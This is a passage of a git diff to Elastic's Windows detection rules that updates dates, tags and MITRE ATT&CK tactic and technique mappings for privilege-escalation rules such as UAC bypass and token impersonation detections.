"https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index e4d788cb975..0b8fc7248da 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,16 +20,7 @@ references = ["https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-gro risk_score = 47 rule_id = "8f3e91c7-d791-4704-80a1-42c160d7aa27" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -83,10 +74,12 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -97,18 +90,19 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -119,9 +113,7 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 0d2a820a60c..1faa3f340cd 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,14 +111,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -162,44 +155,49 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.001" name = "Token Impersonation/Theft" reference = "https://attack.mitre.org/techniques/T1134/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index 75067c258a1..d80c2c3760f 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/06" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,19 +66,7 @@ references = ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34 risk_score = 47 rule_id = "c4818812-d44f-47be-aaef-4cfb2f9cc799" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -91,14 +79,18 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml index c415ada0e36..c9ab8872997 100644 --- a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml +++ b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = ["https://cube0x0.github.io/Pocing-Beyond-DA/"] risk_score = 47 rule_id = "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" @@ -135,46 +122,56 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.011" name = "Services Registry Permissions Weakness" reference = "https://attack.mitre.org/techniques/T1574/011/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index e411a855b25..558c245bdf1 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,19 +92,13 @@ registry.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml index 2f73a8e24e7..72e4b92d865 100644 --- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml +++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/12" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,18 +60,7 @@ references = [ risk_score = 73 rule_id = "bdcf646b-08d4-492c-870a-6c04e3700034" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Use Case: Vulnerability", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Vulnerability", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -84,36 +73,13 @@ iam where host.os.type == "windows" and event.action == "renamed-user-account" a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml index c2d36fb1b78..71c3a72deec 100644 --- a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml +++ b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -88,20 +88,7 @@ references = ["https://www.elastic.co/security-labs/invisible-miners-unveiling-g risk_score = 21 rule_id = "e8571d5f-bea1-46c2-9f56-998de2d3ed95" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -120,73 +107,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml index db144eec549..e3e21e88119 100644 --- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml +++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,24 +87,13 @@ iam where host.os.type == "windows" and event.action == "changed-computer-accoun [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_takeover_new_source_ip.toml b/rules/windows/privilege_escalation_takeover_new_source_ip.toml index dc2dae8d80a..e072fc82581 100644 --- a/rules/windows/privilege_escalation_takeover_new_source_ip.toml +++ b/rules/windows/privilege_escalation_takeover_new_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,14 +43,7 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -76,14 +69,26 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml index 2e44d0cbfe5..72e8665edce 100644 --- a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml +++ b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,3 @@ winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S- ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml index 1ca881499f0..09fe973b8d6 100644 --- a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml +++ b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,14 +75,7 @@ Token Right Adjusted Events (Success) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -120,14 +113,26 @@ any where host.os.type == "windows" and event.provider: "Microsoft-Windows-Secur [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 4f92ccdc7c3..4d2045a1f8c 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,53 +88,54 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml index 97b2898d655..3120f529e85 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = ["https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comaut risk_score = 47 rule_id = "fc7c0fa4-8f03-4b3e-8336-c5feab0be022" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -91,53 +78,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = 